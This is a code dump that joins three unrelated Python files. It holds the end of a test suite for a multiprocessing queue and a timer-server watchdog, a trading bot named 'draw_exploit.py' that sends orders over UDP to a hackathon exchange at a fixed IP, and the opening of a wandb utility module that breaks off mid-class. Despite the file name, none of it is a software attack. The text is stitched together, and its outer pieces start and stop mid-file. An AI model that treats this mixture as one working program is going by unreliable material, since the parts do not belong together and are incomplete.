def test_get_less_than_size(self):
"""
Tests slow producer.
Creates a "producer" process that enqueues ``n`` elements
every ``interval`` seconds. Asserts that a ``get(n, timeout=(interval * n/2))``
yields at most ``n/2`` elements.
"""
mp_queue = mp.Queue()
request_queue = MultiprocessingRequestQueue(mp_queue)
n = 10
interval = 0.1
sem = mp.Semaphore(0)
p = mp.Process(
target=_enqueue_on_interval, args=(mp_queue, n, interval, sem)
)
p.start()
sem.acquire() # blocks until the process has started to run the function
requests = request_queue.get(n, timeout=(interval * (n / 2)))
self.assertLessEqual(n / 2, len(requests))
# timer is not supported on windows or macos
if not (IS_WINDOWS or IS_MACOS or TEST_WITH_DEV_DBG_ASAN):
class LocalTimerServerTest(TestCase):
def setUp(self):
super().setUp()
self.mp_queue = mp.Queue()
self.max_interval = 0.01
self.server = timer.LocalTimerServer(self.mp_queue, self.max_interval)
def tearDown(self):
super().tearDown()
self.server.stop()
def test_watchdog_call_count(self):
"""
checks that the watchdog function ran wait/interval +- 1 times
"""
self.server._run_watchdog = mock.MagicMock(wraps=self.server._run_watchdog)
wait = 0.1
self.server.start()
time.sleep(wait)
self.server.stop()
watchdog_call_count = self.server._run_watchdog.call_count
self.assertGreaterEqual(
watchdog_call_count, int(wait / self.max_interval) - 1
)
self.assertLessEqual(watchdog_call_count, int(wait / self.max_interval) + 1)
def test_watchdog_empty_queue(self):
"""
checks that the watchdog can run on an empty queue
"""
self.server._run_watchdog()
def _expired_timer(self, pid, scope):
expired = time.time() - 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=expired)
def _valid_timer(self, pid, scope):
valid = time.time() + 60
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=valid)
def _release_timer(self, pid, scope):
return TimerRequest(worker_id=pid, scope_id=scope, expiration_time=-1)
@mock.patch("os.kill")
def test_expired_timers(self, mock_os_kill):
"""
tests that a single expired timer on a process should terminate
the process and clean up all pending timers that was owned by the process
"""
test_pid = -3
self.mp_queue.put(self._expired_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_called_once_with(test_pid, signal.SIGKILL)
@mock.patch("os.kill")
def test_acquire_release(self, mock_os_kill):
"""
tests that:
1. a timer can be acquired then released (should not terminate process)
2. a timer can be vacuously released (e.g. no-op)
"""
test_pid = -3
self.mp_queue.put(self._valid_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test1"))
self.mp_queue.put(self._release_timer(pid=test_pid, scope="test2"))
self.server._run_watchdog()
self.assertEqual(0, len(self.server._timers))
mock_os_kill.assert_not_called()
@mock.patch("os.kill")
def test_valid_timers(self, mock_os_kill):
"""
tests that valid timers are processed correctly and the process is left alone
"""
self.mp_queue.put(self._valid_timer(pid=-3, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-3, scope="test2"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test1"))
self.mp_queue.put(self._valid_timer(pid=-2, scope="test2"))
self.server._run_watchdog()
self.assertEqual(4, len(self.server._timers))
self.assertTrue((-3, "test1") in self.server._timers)
self.assertTrue((-3, "test2") in self.server._timers)
self.assertTrue((-2, "test1") in self.server._timers)
self.assertTrue((-2, "test2") in self.server._timers)
mock_os_kill.assert_not_called()
if __name__ == "__main__":
run_tests()
|
draw_exploit.py
|
import numpy as np
np.set_printoptions(linewidth=200)
import matplotlib.pyplot as plt
import matplotlib.dates
import socket
import multiprocessing
import time
import pickle
import datetime
UDP_IP = "188.166.115.7"
UDP_BROADCAST_PORT = 7001
UDP_EXCHANGE_PORT = 8001
HELLO_MESSAGE = "TYPE=SUBSCRIPTION_REQUEST".encode("ascii")
percentage_bought_threshold = 0.6
risk_factor = 0.05
class Trader:
def __init__(self, name):
self.name = name
self.position = {}
self.cash = 0
self.stashed_trades = {}
self.acknowledgements = multiprocessing.Queue()
self.reset_ctr = 0
self.oi = OptiverInterface()
self.oi.append_callback(self.handle_stash)
self.oi.append_callback(self.perform_trade)
self.oi.setup_plot_monitor(['SP-FUTURE','ESX-FUTURE'], timeframe = 10)
self.oi.show_plot_monitors()
self.oi.listen()
def stash_buy(self, product, price, volume):
self.stashed_trades[product] = ('BUY', price, volume)
def stash_sell(self, product, price, volume):
self.stashed_trades[product] = ('SELL', price, volume)
def handle_stash(self, entry):
if entry['TYPE'] == 'TRADE':
product = entry['FEEDCODE']
other_product = 'ESX-FUTURE' if product == 'SP-FUTURE' else 'SP-FUTURE'
if other_product in self.stashed_trades and self.stashed_trades[other_product] is not None:
action, price, volume = self.stashed_trades[other_product]
if action == 'BUY':
self.place_buy(other_product, price, volume)
else:
self.place_sell(other_product, price, volume)
self.stashed_trades[other_product] = None
def place_buy(self, product, price, volume):
print("[{}] {} PLACED. PRODUCT: {}. PRICE: {}. VOLUME: {}.".format(datetime.datetime.now(), 'BUY', product, price, volume))
p = multiprocessing.Process(target = self.oi.buy, args = [self.name, product, price, volume, self.acknowledgements])
p.start()
def place_sell(self, product, price, volume):
print("[{}] {} PLACED. PRODUCT: {}. PRICE: {}. VOLUME: {}.".format(datetime.datetime.now(), 'SELL', product, price, volume))
p = multiprocessing.Process(target = self.oi.sell, args = [self.name, product, price, volume, self.acknowledgements])
p.start()
def synchronize(self):
while not self.acknowledgements.empty():
ack = self.acknowledgements.get_nowait()
ack['TIMESTAMP'] = datetime.datetime.now()
if int(ack['VOLUME']) > 0:
print("[{}] {} ACKNOWLEDGED. PRODUCT: {}. PRICE: {}. VOLUME: {}.".format(ack['TIMESTAMP'], ack['ACTION'], ack['FEEDCODE'], ack['PRICE'], ack['VOLUME']))
self.oi.data_queue.put(ack)
if ack['ACTION'] == 'BUY':
self.cash -= float(ack['PRICE']) * ack['VOLUME']
if ack['FEEDCODE'][6:] not in self.position: self.position[ack['FEEDCODE'][6:]] = ack['VOLUME']
else: self.position[ack['FEEDCODE'][6:]] += ack['VOLUME']
else:
self.cash += float(ack['PRICE']) * ack['VOLUME']
if ack['FEEDCODE'][6:] not in self.position: self.position[ack['FEEDCODE'][6:]] = -ack['VOLUME']
else: self.position[ack['FEEDCODE'][6:]] -= ack['VOLUME']
else:
print("[{}] {} REJECTED. PRODUCT: {}.".format(ack['TIMESTAMP'], ack['ACTION'], ack['FEEDCODE']))
print(self)
def __str__(self):
ss = []
ss.append('Cash: ${}.'.format(self.cash))
for product,position in self.position.items():
ss.append('Position {}: {}.'.format(product,position))
ss.append('Total: ${}.'.format(self.cash + sum(position * self.oi.get_time_price(product)[0] for product,position in self.position.items())))
return ' ' + '\n '.join(ss)
def perform_trade(self, entry):
self.synchronize()
if entry['TYPE'] == 'PRICE':
# Get the relevant information on which to base the decision
product = entry['FEEDCODE']
t = entry['TIMESTAMP']
obp,obv,oap,oav = self.oi.get_time_price(product, (t - datetime.timedelta(milliseconds = 1)))
nbp,nbv,nap,nav = self.oi.get_time_price(product, datetime.datetime.now())
if obp > 1e7: return
if oap - nbp < -.2:
v = min(oav,nbv)
self.place_buy(product, oap + .1, int(.5*v))
self.stash_sell(product, nbp - .1, int(.5*v))
self.reset_ctr = 0
elif obp - nap > .2:
v = min(obv,nav)
self.place_sell(product, obp - .1, int(.5*v))
self.stash_buy(product, nap + .1, int(.5*v))
self.reset_ctr = 0
elif self.reset_ctr == 5 and all(x is None for x in self.stashed_trades.values()):
for product,position in self.position.items():
if position != 0:
bp,bv,ap,av = self.oi.get_time_price(product, (t - datetime.timedelta(milliseconds = 1)))
if position > 0:
self.place_sell(product, 1, min(position,int(.5*bv)))
else:
self.place_buy(product, 100000, min(-position,av))
self.reset_ctr = 0
else:
self.reset_ctr += 1
def product_monitor():
plt.show()
class OptiverInterface:
def __init__(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(("", 8005))
self.s.sendto(HELLO_MESSAGE, (UDP_IP, UDP_BROADCAST_PORT))
self.product_monitor_processes = {}
self.product_monitor_figures = []
self.data_queue = multiprocessing.Queue()
self.products = {}
self.s_exchange = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s_exchange.bind(("", 8002))
self.callbacks = []
def synchronize(self):
while not self.data_queue.empty():
entry = self.data_queue.get_nowait()
# if entry['FEEDCODE'] not in set(['ESX-FUTURE', 'SP-FUTURE']):
# print(entry['FEEDCODE'])
self._update_products(entry)
def append_callback(self, c):
self.callbacks.append(c)
def _update_products(self, entry):
assert set(['TYPE','FEEDCODE','TIMESTAMP']) <= set(entry.keys())
assert entry['TYPE'] in set(['PRICE','TRADE'])
# assert entry['FEEDCODE'] in set(['ESX-FUTURE','SP-FUTURE'])
timestamp = entry['TIMESTAMP']
type = entry['TYPE']
product = entry['FEEDCODE']
if product not in self.products: self.products[product] = {'PRICES' : [], 'TRADES' : []}
if type == 'PRICE':
assert set(['BID_PRICE','BID_VOLUME','ASK_PRICE','ASK_VOLUME']) <= set(entry.keys())
bid_price = float(entry['BID_PRICE'])
bid_volume = int(entry['BID_VOLUME'])
ask_price = float(entry['ASK_PRICE'])
ask_volume = int(entry['ASK_VOLUME'])
self.products[product]['PRICES'].append((timestamp, bid_price, bid_volume, ask_price, ask_volume))
else:
assert set(['SIDE','PRICE','VOLUME']) <= set(entry.keys())
side = entry['SIDE']
price = float(entry['PRICE'])
volume = int(entry['VOLUME'])
self.products[product]['TRADES'].append((timestamp,side,price,volume))
def listen(self):
while True:
data, addr = self.s.recvfrom(1024)
msg = data.decode("ascii")
properties = msg.split("|")
entry = {}
for p in properties:
k,v = p.split("=")
entry[k] = v
now = datetime.datetime.now()
print('[{}] {}'.format(now, entry))
entry['TIMESTAMP'] = now
self._update_products(entry)
self.data_queue.put(entry)
for c in self.callbacks:
c(entry)
def get_last_trade(self):
return max(((product,x['TRADES'][-1]) for product,x in self.products.items() if len(x['TRADES']) > 0), key = lambda x : x[1][0])
def get_timeframe(self, product, now = None, timeframe = 60):
if now is None: now = datetime.datetime.now()
data = self.products[product]
new_data = {'PRICES' : [], 'TRADES' : []}
for t,bp,bv,ap,av in data['PRICES']:
if 0 <= (now - t).total_seconds() <= timeframe:
new_data['PRICES'].append((t,bp,bv,ap,av))
new_data['PRICES'].sort(key = lambda x : x[0])
for t,s,p,v in data['TRADES']:
if 0 <= (now - t).total_seconds() <= timeframe:
new_data['TRADES'].append((t,s,p,v))
new_data['TRADES'].sort(key = lambda x : x[0])
return new_data
def get_time_price(self, product, time = None):
# assert product in self.products
if product not in self.products:
print("WARNING: Product {} not in the products.".format(product))
return
if time is None: time = datetime.datetime.now()
if len(self.products[product]['PRICES']) == 0 or time <= self.products[product]['PRICES'][0][0]:
return (1e8,1e8,1e8,1e8)
for t,bp,bv,ap,av in reversed(self.products[product]['PRICES']):
if t <= time:
return (bp,bv,ap,av)
def plot_product_price(self, product, ax, options = {}):
# assert product in self.products
self.synchronize()
if product not in self.products:
print("WARNING: Product {} not in the products.".format(product))
return
if options.get('clear',True): ax.clear()
# Get the data
now = options.get('now', datetime.datetime.now())
timeframe = options.get('timeframe', 60)
data = self.get_timeframe(product, now = now, timeframe = timeframe)
# Get the product prices
ts = list(x[0] for x in self.products[product]['PRICES'])
bps = list(x[1] for x in self.products[product]['PRICES'])
aps = list(x[3] for x in self.products[product]['PRICES'])
ax.step(ts, bps, where = 'post', label = 'bid prices', color = options.get('bid color', 'blue'))
ax.step(ts, aps, where = 'post', label = 'ask prices', color = options.get('ask color', 'red'))
# Get the product trades
timestamps = list(x[0] for x in data['TRADES'])
sides = list(x[1] for x in data['TRADES'])
prices = list(x[2] for x in data['TRADES'])
volumes = list(x[3] for x in data['TRADES'])
ask_ts,ask_ps,ask_vs = [],[],[]
bid_ts,bid_ps,bid_vs = [],[],[]
for t,s,p,v in zip(timestamps,sides,prices,volumes):
if s == 'ASK':
ask_ts.append(t)
ask_ps.append(p)
ask_vs.append(v/4)
else:
bid_ts.append(t)
bid_ps.append(p)
bid_vs.append(v/4)
ax.scatter(ask_ts, ask_ps, s = ask_vs, label = 'ask trades', color = options.get('ask color', 'red'))
ax.scatter(bid_ts, bid_ps, s = bid_vs, label = 'bid trades', color = options.get('bid color', 'blue'))
for t,p,v in zip(ask_ts,ask_ps,ask_vs):
ax.text(t, p, str(v), va = 'baseline', ha = 'center')
for t,p,v in zip(bid_ts,bid_ps,bid_vs):
ax.text(t, p, str(v), va = 'baseline', ha = 'center')
self.set_default_figure_layout(now, timeframe, ax)
ax.set_title('Product: {}'.format(product))
ax.set_ylabel('Price')
if options.get('draw', True): ax.figure.canvas.draw()
def plot_product_volume(self, product, ax, options = {}):
# assert product in self.products
self.synchronize()
if product not in self.products:
print("WARNING: Product {} not in the products.".format(product))
return
if options.get('clear',True): ax.clear()
# Get the data
now = options.get('now', datetime.datetime.now())
timeframe = options.get('timeframe', 60)
data = self.get_timeframe(product, now = now, timeframe = timeframe)
# Get the product volumes
ts = list(x[0] for x in data['TRADES'])
ss = list(x[1] for x in data['TRADES'])
vs = list(x[3] for x in data['TRADES'])
ask_ts,ask_vs,bid_ts,bid_vs = [],[],[],[]
for t,s,v in zip(ts,ss,vs):
bp,bv,ap,av = self.get_time_price(product, t - datetime.timedelta(milliseconds = 1))
if s == 'ASK':
ask_ts.append(t)
ask_vs.append(v/av)
else:
bid_ts.append(t)
bid_vs.append(v/bv)
ax.scatter(ask_ts, ask_vs, label = 'ask volumes', color = 'red', marker = options.get('marker','o'))
ax.scatter(bid_ts, bid_vs, label = 'bid volumes', color = 'blue', marker = options.get('marker','o'))
self.set_default_figure_layout(now, timeframe, ax)
ax.set_title('Volumes')
ax.set_ylabel('Volume')
ax.set_ylim((0,1))
if options.get('draw', True): ax.figure.canvas.draw()
def setup_plot_monitor(self, products, **kwargs):
fig = plt.figure()
timer = fig.canvas.new_timer(interval = 500)
kwargs['draw'] = False
vol_kwargs = kwargs.copy()
trade_kwargs = kwargs.copy()
trade_kwargs['clear'] = False
trade_kwargs['ask color'] = 'cyan'
trade_kwargs['bid color'] = 'magenta'
vol_ax = fig.add_subplot(3,1,3)
for i,product in enumerate(products):
print("Starting a monitor of the prices of product {}...".format(product))
ax = fig.add_subplot(3,1,i+1)
timer.add_callback(self.plot_product_price, product, ax, kwargs.copy())
timer.add_callback(self.plot_product_price, 'TRADE_' + product, ax, trade_kwargs.copy())
if i == len(products) - 1: vol_kwargs['draw'] = True
timer.add_callback(self.plot_product_volume, product, vol_ax, vol_kwargs.copy())
vol_kwargs['clear'] = False
vol_kwargs['marker'] = 'x'
timer.start()
self.product_monitor_figures.append(fig)
return fig
def set_default_figure_layout(self, now, timeframe, ax):
ax.set_xlabel('Time')
ax.set_xlim((now - datetime.timedelta(seconds = timeframe), now))
ax.xaxis.set_major_locator(matplotlib.dates.SecondLocator())
ax.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%Y:%M:%S'))
ax.tick_params(axis = 'x', labelrotation = 90)
def show_plot_monitors(self):
pmp = multiprocessing.Process(target = product_monitor)
pmp.start()
idx = len(self.product_monitor_processes)
self.product_monitor_processes[idx] = (pmp, self.product_monitor_figures)
self.product_monitor_figures = []
return idx
def close_plot_monitors(self, idx = 0):
pmp, figs = self.product_monitor_processes[idx]
pmp.terminate()
del self.product_monitor_processes[idx]
def buy(self, user, feedcode, price, volume, queue = None):
text = "TYPE=ORDER|USERNAME={}|FEEDCODE={}|ACTION=BUY|PRICE={}|VOLUME={}".format(user, feedcode, price, volume)
# print("----------------")
# print(text)
# print("----------------")
# time.sleep(.1 * sleep)
self.s_exchange.sendto(text.encode('ascii'), (UDP_IP, UDP_EXCHANGE_PORT))
data = self.s_exchange.recvfrom(1024)[0]
msg = data.decode("ascii")
properties = msg.split("|")
entry = {}
for p in properties:
k, v = p.split("=")
entry[k] = v
assert entry['TYPE'] == "ORDER_ACK"
entry['TYPE'] = 'TRADE'
entry['FEEDCODE'] = 'TRADE_' + entry['FEEDCODE']
entry['VOLUME'] = int(entry['TRADED_VOLUME'])
entry['SIDE'] = 'ASK'
entry['ACTION'] = 'BUY'
if queue is None:
return entry
else:
queue.put(entry)
def sell(self, user, feedcode, price, volume, queue = None):
text = "TYPE=ORDER|USERNAME={}|FEEDCODE={}|ACTION=SELL|PRICE={}|VOLUME={}".format(user, feedcode, price, volume)
# print("----------------")
# print(text)
# print("----------------")
# time.sleep(sleep * .1)
self.s_exchange.sendto(text.encode('ascii'), (UDP_IP, UDP_EXCHANGE_PORT))
data = self.s_exchange.recvfrom(1024)[0]
msg = data.decode("ascii")
properties = msg.split("|")
entry = {}
for p in properties:
k, v = p.split("=")
entry[k] = v
assert entry['TYPE'] == "ORDER_ACK"
entry['TYPE'] = 'TRADE'
entry['FEEDCODE'] = 'TRADE_' + entry['FEEDCODE']
entry['VOLUME'] = -int(entry['TRADED_VOLUME'])
entry['SIDE'] = 'BID'
entry['ACTION'] = 'SELL'
if queue is None:
return entry
else:
queue.put(entry)
if __name__ == "__main__":
# Test plotting
trader = Trader(name = 'baas-2')
|
util.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import base64
import binascii
import colorsys
import contextlib
import codecs
import errno
import hashlib
import json
import getpass
import logging
import math
import os
import re
import shlex
import socket
import subprocess
import sys
import threading
import time
import random
import stat
import shortuuid
import importlib
import types
import yaml
from datetime import date, datetime
import platform
from six.moves.urllib.parse import urlparse
import click
import requests
import six
from six.moves import queue
import textwrap
from sys import getsizeof
from collections import namedtuple
from six.moves.collections_abc import Mapping, Sequence
from importlib import import_module
import sentry_sdk
from sentry_sdk import capture_exception
from sentry_sdk import capture_message
from sentry_sdk import configure_scope
from wandb.env import error_reporting_enabled
import wandb
from wandb.errors import CommError
from wandb.old.core import wandb_dir
from wandb import env
logger = logging.getLogger(__name__)
_not_importable = set()
MAX_LINE_SIZE = 4 * 1024 * 1024 - 100 * 1024 # imposed by back end
IS_GIT = os.path.exists(os.path.join(os.path.dirname(__file__), "..", ".git"))
# these match the environments for gorilla
if IS_GIT:
SENTRY_ENV = "development"
else:
SENTRY_ENV = "production"
if error_reporting_enabled():
sentry_sdk.init(
dsn="https://a2f1d701163c42b097b9588e56b1c37e@o151352.ingest.sentry.io/5288891",
release=wandb.__version__,
default_integrations=False,
environment=SENTRY_ENV,
)
POW_10_BYTES = [
("B", 10 ** 0),
("KB", 10 ** 3),
("MB", 10 ** 6),
("GB", 10 ** 9),
("TB", 10 ** 12),
("PB", 10 ** 15),
("EB", 10 ** 18),
]
POW_2_BYTES = [
("B", 2 ** 0),
("KiB", 2 ** 10),
("MiB", 2 ** 20),
("GiB", 2 ** 30),
("TiB", 2 ** 40),
("PiB", 2 ** 50),
("EiB", 2 ** 60),
]
def sentry_message(message):
if error_reporting_enabled():
capture_message(message)
def sentry_exc(exc, delay=False):
if error_reporting_enabled():
if isinstance(exc, six.string_types):
capture_exception(Exception(exc))
else:
capture_exception(exc)
if delay:
time.sleep(2)
def sentry_reraise(exc):
"""Re-raise an exception after logging it to Sentry
Use this for top-level exceptions when you want the user to see the traceback.
Must be called from within an exception handler.
"""
sentry_exc(exc)
# this will messily add this "reraise" function to the stack trace
# but hopefully it's not too bad
six.reraise(type(exc), exc, sys.exc_info()[2])
def sentry_set_scope(process_context, entity, project, email=None, url=None):
# Using GLOBAL_HUB means these tags will persist between threads.
# Normally there is one hub per thread.
with sentry_sdk.hub.GLOBAL_HUB.configure_scope() as scope:
scope.set_tag("process_context", process_context)
scope.set_tag("entity", entity)
scope.set_tag("project", project)
if email:
scope.user = {"email": email}
if url:
scope.set_tag("url", url)
def vendor_setup():
"""This enables us to use the vendor directory for packages we don't depend on
Returns a function to call after imports are complete. Make sure to call this
function or you will modify the user's path which is never good. The pattern should be:
reset_path = vendor_setup()
# do any vendor imports...
reset_path()
"""
original_path = [directory for directory in sys.path]
def reset_import_path():
sys.path = original_path
parent_dir = os.path.abspath(os.path.dirname(__file__))
vendor_dir = os.path.join(parent_dir, "vendor")
vendor_packages = ("gql-0.2.0", "graphql-core-1.1")
package_dirs = [os.path.join(vendor_dir, p) for p in vendor_packages]
for p in [vendor_dir] + package_dirs:
if p not in sys.path:
sys.path.insert(1, p)
return reset_import_path
def apple_gpu_stats_binary():
parent_dir = os.path.abspath(os.path.dirname(__file__))
return os.path.join(parent_dir, "bin", "apple_gpu_stats")
def vendor_import(name):
reset_path = vendor_setup()
module = import_module(name)
reset_path()
return module
def get_module(name, required=None):
"""
Return module or None. Absolute import is required.
:param (str) name: Dot-separated module path. E.g., 'scipy.stats'.
:param (str) required: A string to raise a ValueError if missing
:return: (module|None) If import succeeds, the module will be returned.
"""
if name not in _not_importable:
try:
return import_module(name)
except Exception as e:
_not_importable.add(name)
msg = "Error importing optional module {}".format(name)
if required:
logger.exception(msg)
if required and name in _not_importable:
raise wandb.Error(required)
class LazyLoader(types.ModuleType):
"""Lazily import a module, mainly to avoid pulling in large dependencies.
we use this for tensorflow and other optional libraries primarily at the top module level
"""
# The lint error here is incorrect.
def __init__(
self, local_name, parent_module_globals, name, warning=None
): # pylint: disable=super-on-old-class
self._local_name = local_name
self._parent_module_globals = parent_module_globals
self._warning = warning
super(LazyLoader, self).__init__(name)
def _load(self):
"""Load the module and insert it into the parent's globals."""
# Import the target module and insert it into the parent's namespace
module = importlib.import_module(self.__name__)
self._parent_module_globals[self._local_name] = module
# Emit a warning if one was specified
if self._warning:
print(self._warning)
# Make sure to only warn once.
self._warning = None
# Update this object's dict so that if someone keeps a reference to the
# LazyLoader, lookups are efficient (__getattr__ is only called on lookups
# that fail).
self.__dict__.update(module.__dict__)
return module
def __getattr__(self, item):
module = self._load()
return getattr(module, item)
def __dir__(self):
module = self._load()
return dir(module)
class PreInitObject(object):
def __init__(self, name):
self._name = name
def __getitem__(self, key):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setitem__(self, key, value):
raise wandb.Error(
'You must call wandb.init() before {}["{}"]'.format(self._name, key)
)
def __setattr__(self, key, value):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
return object.__setattr__(self, key, value)
def __getattr__(self, key):
if not key.startswith("_"):
raise wandb.Error(
"You must call wandb.init() before {}.{}".format(self._name, key)
)
else:
raise AttributeError()
np = get_module("numpy")
MAX_SLEEP_SECONDS = 60 * 5
# TODO: Revisit these limits
VALUE_BYTES_LIMIT = 100000
def app_url(api_url):
if "://api.wandb.test" in api_url:
# dev mode
return api_url.replace("://api.", "://app.")
elif "://api.wandb." in api_url:
# cloud
return api_url.replace("://api.", "://")
elif "://api." in api_url:
# onprem cloud
return api_url.replace("://api.", "://app.")
# wandb/local
return api_url
def get_full_typename(o):
"""We determine types based on type names so we don't have to import
(and therefore depend on) PyTorch, TensorFlow, etc.
"""
instance_name = o.__class__.__module__ + "." + o.__class__.__name__
if instance_name in ["builtins.module", "__builtin__.module"]:
return o.__name__
else:
return instance_name
def get_h5_typename(o):
typename = get_full_typename(o)
if is_tf_tensor_typename(typename):
return "tensorflow.Tensor"
elif is_pytorch_tensor_typename(typename):
return "torch.Tensor"
else:
return o.__class__.__module__.split(".")[0] + "." + o.__class__.__name__
def is_tf_tensor(obj):
import tensorflow
return isinstance(obj, tensorflow.Tensor)
def is_tf_tensor_typename(typename):
return typename.startswith("tensorflow.") and (
"Tensor" in typename or "Variable" in typename
)
def is_tf_eager_tensor_typename(typename):
return typename.startswith("tensorflow.") and ("EagerTensor" in typename)
def is_pytorch_tensor(obj):
import torch
return isinstance(obj, torch.Tensor)
def is_pytorch_tensor_typename(typename):
return typename.startswith("torch.") and (
"Tensor" in typename or "Variable" in typename
)
def is_fastai_tensor_typename(typename):
return typename.startswith("fastai.") and ("Tensor" in typename)
def is_pandas_data_frame_typename(typename):
return typename.startswith("pandas.") and "DataFrame" in typename
def is_matplotlib_typename(typename):
return typename.startswith("matplotlib.")
def is_plotly_typename(typename):
return typename.startswith("plotly.")
def is_plotly_figure_typename(typename):
return typename.startswith("plotly.") and typename.endswith(".Figure")
def is_numpy_array(obj):
return np and isinstance(obj, np.ndarray)
def is_pandas_data_frame(obj):
return is_pandas_data_frame_typename(get_full_typename(obj))
def ensure_matplotlib_figure(obj):
"""Extract the current figure from a matplotlib object or return the object if it's a figure.
raises ValueError if the object can't be converted.
"""
import matplotlib
from matplotlib.figure import Figure
# plotly and matplotlib broke in recent releases,
# this patches matplotlib to add a removed method that plotly assumes exists
from matplotlib.spines import Spine
def is_frame_like(self):
"""Return True if directly on axes frame.
This is useful for determining if a spine is the edge of an
old style MPL plot. If so, this function will return True.
"""
position = self._position or ("outward", 0.0)
if isinstance(position, str):
if position == "center":
position = ("axes", 0.5)
elif position == "zero":
position = ("data", 0)
if len(position) != 2:
raise ValueError("position should be 2-tuple")
position_type, amount = position
if position_type == "outward" and amount == 0:
return True
else:
return False
Spine.is_frame_like = is_frame_like
if obj == matplotlib.pyplot:
obj = obj.gcf()
elif not isinstance(obj, Figure):
if hasattr(obj, "figure"):
obj = obj.figure
# Some matplotlib objects have a figure function
if not isinstance(obj, Figure):
raise ValueError(
"Only matplotlib.pyplot or matplotlib.pyplot.Figure objects are accepted."
)
return obj
def matplotlib_to_plotly(obj):
obj = ensure_matplotlib_figure(obj)
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
return tools.mpl_to_plotly(obj)
def matplotlib_contains_images(obj):
obj = ensure_matplotlib_figure(obj)
return any(len(ax.images) > 0 for ax in obj.axes)
def json_friendly(obj):
"""Convert an object into something that's more becoming of JSON"""
converted = True
typename = get_full_typename(obj)
if is_tf_eager_tensor_typename(typename):
obj = obj.numpy()
elif is_tf_tensor_typename(typename):
try:
obj = obj.eval()
except RuntimeError:
obj = obj.numpy()
elif is_pytorch_tensor_typename(typename) or is_fastai_tensor_typename(typename):
try:
if obj.requires_grad:
obj = obj.detach()
except AttributeError:
pass # before 0.4 is only present on variables
try:
obj = obj.data
except RuntimeError:
pass # happens for Tensors before 0.4
if obj.size():
obj = obj.numpy()
else:
return obj.item(), True
if is_numpy_array(obj):
if obj.size == 1:
obj = obj.flatten()[0]
elif obj.size <= 32:
obj = obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
if isinstance(obj, float) and math.isnan(obj):
obj = None
elif isinstance(obj, bytes):
obj = obj.decode("utf-8")
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
elif callable(obj):
obj = (
"{}.{}".format(obj.__module__, obj.__qualname__)
if hasattr(obj, "__qualname__") and hasattr(obj, "__module__")
else str(obj)
)
elif isinstance(obj, float) and math.isnan(obj):
obj = None
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn(
"Serializing object of type {} that is {} bytes".format(
type(obj).__name__, getsizeof(obj)
)
)
return obj, converted
def json_friendly_val(val):
"""Make any value (including dict, slice, sequence, etc) JSON friendly"""
if isinstance(val, dict):
converted = {}
for key, value in six.iteritems(val):
converted[key] = json_friendly_val(value)
return converted
if isinstance(val, slice):
converted = dict(
slice_start=val.start, slice_step=val.step, slice_stop=val.stop
)
return converted
val, _ = json_friendly(val)
if isinstance(val, Sequence) and not isinstance(val, six.string_types):
converted = []
for value in val:
converted.append(json_friendly_val(value))
return converted
else:
if val.__class__.__module__ not in ("builtins", "__builtin__"):
val = str(val)
return val
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return (
{
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size,
},
True,
)
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ["DISPLAY", "WAYLAND_DISPLAY", "MIR_SOCKET"]
_WEBBROWSER_NAMES_BLACKLIST = ["www-browser", "lynx", "links", "elinks", "w3m"]
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if "linux" in sys.platform and not any(
os.getenv(var) for var in _DISPLAY_VARIABLES
):
launch_browser = False
try:
browser = webbrowser.get()
if hasattr(browser, "name") and browser.name in _WEBBROWSER_NAMES_BLACKLIST:
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id():
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list("0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(8)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
if hasattr(obj, "json_encode"):
return obj.json_encode()
# if hasattr(obj, 'to_json'):
# return obj.to_json()
tmp_obj, converted = json_friendly(obj)
if converted:
return tmp_obj
return json.JSONEncoder.default(self, obj)
class WandBJSONEncoderOld(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
